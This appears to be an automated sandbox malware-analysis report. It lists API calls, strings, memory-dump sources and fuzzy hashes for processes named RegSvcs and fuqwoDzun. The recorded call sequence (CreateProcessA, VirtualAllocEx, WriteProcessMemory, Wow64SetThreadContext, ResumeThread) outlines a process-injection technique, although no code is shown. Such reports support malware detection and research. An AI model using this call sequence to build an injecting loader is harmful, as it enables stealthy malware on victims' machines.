                                                        • Instruction Fuzzy Hash: 5721517AE00119ABDB11DE79CC50ABEBBF9EF54651F08411EEA15E3200E730DA158BA1
                                                        Strings
                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 016902E7
                                                        • RTL: Re-Waiting, xrefs: 0169031E
                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 016902BD
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                        • API String ID: 0-2474120054
                                                        • Opcode ID: ede730f6b424ee3d23fcca0680c96f4c57798f388e9f61b0d04bffd2c63d18da
                                                        • Instruction ID: 581de54478d748f720d2ed469482b438c5e15d146d55fea0951cd7f1c0f84111
                                                        • Opcode Fuzzy Hash: ede730f6b424ee3d23fcca0680c96f4c57798f388e9f61b0d04bffd2c63d18da
                                                        • Instruction Fuzzy Hash: 1EE1AC706087429FEB25CF2CCC84B2ABBE9AB85324F144A9DF5A58B3D1D774D845CB42
                                                        Strings
                                                        • RTL: Re-Waiting, xrefs: 01697BAC
                                                        • RTL: Resource at %p, xrefs: 01697B8E
                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01697B7F
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                        • API String ID: 0-871070163
                                                        • Opcode ID: 37c71c85a01c7d2c353c794a44ee3679c150a21345beea95a48fbf0f03b8f4c7
                                                        • Instruction ID: 71dbad531b24956e28806ce13c88416cb21ad28005f482ecf0aee26d1a35915d
                                                        • Opcode Fuzzy Hash: 37c71c85a01c7d2c353c794a44ee3679c150a21345beea95a48fbf0f03b8f4c7
                                                        • Instruction Fuzzy Hash: BD41E2317007029FDB25CE2DDC40B6AB7EAEF98710F100A1DE95A9B380DB31E8058F95
                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0169728C
                                                        Strings
                                                        • RTL: Re-Waiting, xrefs: 016972C1
                                                        • RTL: Resource at %p, xrefs: 016972A3
                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01697294
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                        • API String ID: 885266447-605551621
                                                        • Opcode ID: 54ab18484dc5572d79ebe932786b1ba062e5a24c07cb4bfbb56bc6ea30a41664
                                                        • Instruction ID: a58019a71875c8df013bb04d3e60e89a85a459002bde078bdf8113180cd98075
                                                        • Opcode Fuzzy Hash: 54ab18484dc5572d79ebe932786b1ba062e5a24c07cb4bfbb56bc6ea30a41664
                                                        • Instruction Fuzzy Hash: 7F41FF31611206ABCB21CE69CC81B6ABBAAFF94710F14465DFD55EB380DB20E8528BD5
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: %%%u$]:%u
                                                        • API String ID: 48624451-3050659472
                                                        • Opcode ID: b3b59becaf48e5cac8cb5c4e0411b9b652b8c16af2df4b35077ad59d9c95e69d
                                                        • Instruction ID: a9ca8117f4434ac0ad5d50d9d1f46dd98f7ae43ef23e71c0bd84c65ea67bb70d
                                                        • Opcode Fuzzy Hash: b3b59becaf48e5cac8cb5c4e0411b9b652b8c16af2df4b35077ad59d9c95e69d
                                                        • Instruction Fuzzy Hash: DB318172A002199FDB20DF2DCC50BEEB7F9EB44610F45455EED49E3200EF30AA548BA0
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: __aulldvrm
                                                        • String ID: +$-
                                                        • API String ID: 1302938615-2137968064
                                                        • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                        • Instruction ID: 2d5b6f16d1d83535f5a6ab1ad42409fe2206da714652ac694a9376635612f62d
                                                        • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                        • Instruction Fuzzy Hash: 3891B271E0020A9BEB24DF6DCC80ABEBBBDAF84728F14451AE955E73C0D7349941CB51
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $$@
                                                        • API String ID: 0-1194432280
                                                        • Opcode ID: 3211f14d5238881fe04c9304802790714eb01125b0116dcfdd12e549fe93c1a5
                                                        • Instruction ID: ae7f058f65aced2930810460b94554d605f0b177b4752f2d93c2770d633d53ea
                                                        • Opcode Fuzzy Hash: 3211f14d5238881fe04c9304802790714eb01125b0116dcfdd12e549fe93c1a5
                                                        • Instruction Fuzzy Hash: 4C812971D002799BDB31DB54CC54BEABBB8AF48714F1041EAEA19B7280D7709E85CFA4
                                                        APIs
                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 016ACFBD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: CallFilterFunc@8
                                                        • String ID: @$@4_w@4_w
                                                        • API String ID: 4062629308-713214301
                                                        • Opcode ID: 8eaed43bff176376fcdb34a48ec721473e9e7d57f75f5cc7d96a361d9b92ed50
                                                        • Instruction ID: 28671b3321d8225b4c0f4480462f6c7faf9a73811461f129cb5004a0e4104fb0
                                                        • Opcode Fuzzy Hash: 8eaed43bff176376fcdb34a48ec721473e9e7d57f75f5cc7d96a361d9b92ed50
                                                        • Instruction Fuzzy Hash: 58419AB5940215DFDB219FA9CD40AAEBBB9FF54B10F00802EEA05EB354D774D801CB65

                                                        Execution Graph

                                                        Execution Coverage:10.5%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:182
                                                        Total number of Limit Nodes:8

                                                        Control-flow Graph

                                                        APIs
                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06915516
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1585961605.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6910000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: cafc4d24758b533fff35a9ab80385f9e708ddbf183994568a0120b73d5bfe48a
                                                        • Instruction ID: cf03de9e95b4be838701e2d6bfe835fc28bb423b7dd7c2000ff0eca540f8c315
                                                        • Opcode Fuzzy Hash: cafc4d24758b533fff35a9ab80385f9e708ddbf183994568a0120b73d5bfe48a
                                                        • Instruction Fuzzy Hash: BBA13EB1D0021DCFEB60CF68C8417EDBBB6AF84310F268569E819AB684D7749985CF91

                                                        Control-flow Graph

                                                        APIs
                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06915516
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1585961605.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6910000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: a79bdad28c091d128665c49d70dacbac7298e7ed6a7f4e22c9e25409710fdc58
                                                        • Instruction ID: cdd356ab2fc60a814052eec359b8cb911d41b367af8aa557cbfac6548a7961ce
                                                        • Opcode Fuzzy Hash: a79bdad28c091d128665c49d70dacbac7298e7ed6a7f4e22c9e25409710fdc58
                                                        • Instruction Fuzzy Hash: 33914DB1D0031DCFEB60CF68C8417EDBBB6AF84310F268569D819AB284DB749985CF91

                                                        Control-flow Graph

                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 00A959A9
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1511703886.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_a90000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: 6edb07de820fd79c989d3482a706b53821085490d7afbd37e5eaa7244ace7ce3
                                                        • Instruction ID: cae7a28cc72afa1973c08ede23738bd49d6bb430cd60456ea2c43685ff8a65e6
                                                        • Opcode Fuzzy Hash: 6edb07de820fd79c989d3482a706b53821085490d7afbd37e5eaa7244ace7ce3
                                                        • Instruction Fuzzy Hash: 2B41D270D04718CFDB25CFA9C885B9EBBF1BF49304F20816AD459AB291D7B1694ACF90

                                                        Control-flow Graph

                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 00A959A9
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1511703886.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_a90000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: f947c72a4ba06655ae912cbe2bd7ddd38dd107d2763f575c1251b8f6600bb556
                                                        • Instruction ID: 3ea62978a1ffce3e7b26f7792aa49f470ebd263e7ff9ab2d3a9ac313bd3e3305
                                                        • Opcode Fuzzy Hash: f947c72a4ba06655ae912cbe2bd7ddd38dd107d2763f575c1251b8f6600bb556
                                                        • Instruction Fuzzy Hash: 6D41CFB0D0071DCBDB24DFA9C885B9EBBF5BF49304F20816AD418AB251DBB16945CF90

                                                        Control-flow Graph

                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 069150E8
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1585961605.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6910000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: 4a90aeef45078e836aef69e6c2d93b095cd4abd854ef9ecf43f60021de2225d1
                                                        • Instruction ID: 8c823cc10bc1796ba047c6d3b10d6c7a0a764b0e7985e04a638db66178066e75
                                                        • Opcode Fuzzy Hash: 4a90aeef45078e836aef69e6c2d93b095cd4abd854ef9ecf43f60021de2225d1
                                                        • Instruction Fuzzy Hash: 282137B5D003099FDB50CFA9C8857EEBBF5FB48314F21842AE958A7241C7B59941CBA0

                                                        Control-flow Graph

                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 069151C8
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1585961605.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6910000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessRead

                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 069150E8
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1585961605.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6910000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite

                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06914F3E
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1585961605.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6910000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64

                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06914F3E
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1585961605.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6910000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64

                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 069151C8
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1585961605.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6910000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessRead

                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00A9DF01,00000800,00000000,00000000), ref: 00A9E112
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1511703886.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_a90000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad

                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06915006
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1585961605.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6910000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1585961605.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6910000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread

                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06915006
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1585961605.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6910000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1585961605.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6910000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 00A9DE86
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1511703886.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_a90000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 069187D5
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1585961605.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6910000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID: MessagePost
                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 069187D5
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1585961605.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6910000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID: MessagePost

                                                        Execution Graph

                                                        Execution Coverage:0%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:5
                                                        Total number of Limit Nodes:1
                                                        execution_graph 62035 1142b60 LdrInitializeThunk 62039 1142c00 62041 1142c0a 62039->62041 62042 1142c11 62041->62042 62043 1142c1f LdrInitializeThunk 62041->62043

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 1142c0a-1142c0f 1 1142c11-1142c18 0->1 2 1142c1f-1142c26 LdrInitializeThunk 0->2
                                                        APIs
                                                        • LdrInitializeThunk.NTDLL(0115FD4F,000000FF,00000024,011F6634,00000004,00000000,?,-00000018,7D810F61,?,?,01118B12,?,?,?,?), ref: 01142C24
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: dba909999f6eedaa3c6d7c0f03c52461cd82fe67309f8eceeab1734e858887a3
                                                        • Instruction ID: 51df5e1f68fe0b5a2ecdb307994e9fb93c240db987ca5410b4ebd93c8612a4fa
                                                        • Opcode Fuzzy Hash: dba909999f6eedaa3c6d7c0f03c52461cd82fe67309f8eceeab1734e858887a3
                                                        • Instruction Fuzzy Hash: 3EB09B719015C5C6DB55E7645708717790077D0701F25C061F2130641F4778C1D1E675

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 4 1142b60-1142b6c LdrInitializeThunk
                                                        APIs
                                                        • LdrInitializeThunk.NTDLL(01170DBD,?,?,?,?,01164302), ref: 01142B6A
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: a90c2b1da3a24100a86a9835afa027171611ddc174f0a61628c0e0b864a7baf4
                                                        • Instruction ID: 24c54b08d534af1a448593e9c19fc1330cb911b1899edcd7107a9966507bce0f
                                                        • Opcode Fuzzy Hash: a90c2b1da3a24100a86a9835afa027171611ddc174f0a61628c0e0b864a7baf4
                                                        • Instruction Fuzzy Hash: B690026120240043424971598514616400A97E0201B55C021F5115590DC62589916625

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 6 1142df0-1142dfc LdrInitializeThunk
                                                        APIs
                                                        • LdrInitializeThunk.NTDLL(0117E73E,0000005A,011DD040,00000020,00000000,011DD040,00000080,01164A81,00000000,-00000001,-00000001,00000002,00000000,?,-00000001,0114AE00), ref: 01142DFA
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 3b1c48adf025244af7bc636abfddebca4b121fac4d8d8fad738348bce1348cb5
                                                        • Instruction ID: e8523e5f539f76d97e6074d5a3e98f1b02a3e4efa5dbe39e5cf5af5196f756f2
                                                        • Opcode Fuzzy Hash: 3b1c48adf025244af7bc636abfddebca4b121fac4d8d8fad738348bce1348cb5
                                                        • Instruction Fuzzy Hash: B290023120140453D25571598604707000997D0241F95C412B4525558DD7568A52A621

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 5 1142c70-1142c7c LdrInitializeThunk
                                                        APIs
                                                        • LdrInitializeThunk.NTDLL(010FFB34,000000FF,?,-00000018,?,00000000,00004000,00000000,?,?,01157BE5,00001000,00004000,000000FF,?,00000000), ref: 01142C7A
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 4acbf673a99cf0cb73d2cb224781aab4a0c1cde6cc9a44e086f3f592bdc2dd3e
                                                        • Instruction ID: 3bc3e2892cb4fc14f3fb96c7f22e7f9f92baf7275aae44581ea1ff5ad72ae39a
                                                        • Opcode Fuzzy Hash: 4acbf673a99cf0cb73d2cb224781aab4a0c1cde6cc9a44e086f3f592bdc2dd3e
                                                        • Instruction Fuzzy Hash: E490023120148842D2547159C50474A000597D0301F59C411B8525658DC79589917621

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 7 11435c0-11435cc LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: cbfdf6cad0dca05251499e114acad9e979c719ef36b0f4eda97f0819788579aa
                                                        • Instruction ID: 3ca4f1105e5f8c84f35f36511cc64975d0b04f166e50e3c8b1360365d02ffd98
                                                        • Opcode Fuzzy Hash: cbfdf6cad0dca05251499e114acad9e979c719ef36b0f4eda97f0819788579aa
                                                        • Instruction Fuzzy Hash: FF90023160550442D24471598614706100597D0201F65C411B4525568DC7958A516AA2

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 8 1144a80-1144a8b 9 1144a8d-1144a99 RtlDebugPrintTimes 8->9 10 1144a9f-1144aa6 8->10 9->10 15 1144b25-1144b26 9->15 11 1144aaf-1144ab6 call 112f5a0 10->11 12 1144aa8-1144aae 10->12 17 1144b23 11->17 18 1144ab8-1144b22 call 1131e46 * 2 11->18 17->15 18->17
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: 0ITw$0ITw$0ITw$0ITw$0ITw$0ITw
                                                        • API String ID: 3446177414-3283678409
